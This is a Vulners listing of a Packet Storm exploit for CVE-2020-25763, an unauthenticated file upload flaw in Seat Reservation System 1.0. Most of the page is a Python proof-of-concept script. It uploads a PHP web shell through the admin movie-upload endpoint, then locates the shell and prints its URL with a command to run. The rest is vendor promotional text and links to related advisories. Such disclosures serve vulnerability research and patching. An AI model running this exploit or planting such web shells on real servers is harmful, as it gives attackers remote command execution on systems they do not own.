Vulners
Lucene search
Seat Reservation System 1.0 Shell Upload
🗓️ 21 Sep 2020 00:00:00Reported by Rahul RamkumarType 
packetstorm🔗 packetstormsecurity.com👁 189 Views
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | CVE-2020-25763 | 30 Sep 202022:58 | – | circl |
 | Seat Reservation System Arbitrary File Upload (CVE-2020-25763) | 25 Nov 202000:00 | – | checkpoint_advisories |
 | CVE-2020-25763 | 29 Sep 202019:17 | – | cve |
 | CVE-2020-25763 | 29 Sep 202019:17 | – | cvelist |
 | Seat Reservation System 1.0 - Remote Code Execution (Unauthenticated) | 16 Oct 202000:00 | – | exploitdb |
 | CVE-2020-25763 | 30 Sep 202018:15 | – | nvd |
 | CVE-2020-25763 | 30 Sep 202018:15 | – | osv |
 | Unrestricted file upload | 30 Sep 202018:15 | – | prion |
 | CVE-2020-25763 | 22 May 202517:55 | – | redhatcve |
`Seat Reservation System version 1.0 suffers from an Unauthenticated File
Upload Vulnerability allowing Remote Attackers to gain Remote Code
Execution (RCE) on the Hosting Webserver via uploading PHP files.
Vendor Homepage: www.sourcecodester.com
Software Link:
https://www.sourcecodester.com/sites/default/files/download/oretnom23/seat-reservation-system-using-php_0.zip
Author: Rahul Ramkumar
Date: 2020-09-16
CVE: CVE-2020-25763
PoC:
-------
# Exploit Title: Seat Reservation System 1.0 - Unauthenticated Remote Code
Execution
import requests, sys, urllib, re
from lxml import etree
from io import StringIO
from colorama import Fore, Back, Style
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
import random
import string
def print_usage(STRING):
return Style.BRIGHT+Fore.YELLOW+STRING+Fore.RESET
if __name__ == "__main__":
if len(sys.argv) != 2:
print print_usage("Usage:\t\t python %s <WEBAPP_URL>" % sys.argv[0])
print print_usage("Example:\t python %s '
https://192.168.1.72:443/seat_reservation/'" % sys.argv[0])
sys.exit(-1)
SERVER_URL = sys.argv[1]
UPLOAD_DIR = 'admin/ajax.php?action=save_movie'
UPLOAD_URL = SERVER_URL + UPLOAD_DIR
random = ''.join([random.choice(string.ascii_letters + string.digits)
for n in xrange(16)])
webshell = random+'.php'
s = requests.Session()
s.get(SERVER_URL, verify=False)
image = {
'cover':
(
webshell,
'<?php echo shell_exec($_GET["d3crypt"]); ?>',
'application/php',
{'Content-Disposition': 'form-data'}
)
}
fdata = {'id':
'','title':'Shelling','description':'','duration_hour':'3','duration_min':'0','date_showing':'2020-01-01','end_date':'2040-09-25'}
r1 = s.post(url=UPLOAD_URL, files=image, data=fdata, verify=False)
r2 = s.get(SERVER_URL, verify=False)
response_page = r2.content.decode("utf-8")
parser = etree.HTMLParser()
tree = etree.parse(StringIO(response_page), parser=parser)
def get_links(tree):
refs = tree.xpath("//img")
links = [link.get('src', '') for link in refs]
return [l for l in links]
links = get_links(tree)
print('Access your webshell at: ')
for link in links:
if webshell in link:
print(SERVER_URL + link+'?d3crypt=whoami')
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Sep 2020 00:00Current
9.7High risk
Vulners AI Score9.7
EPSS0.12349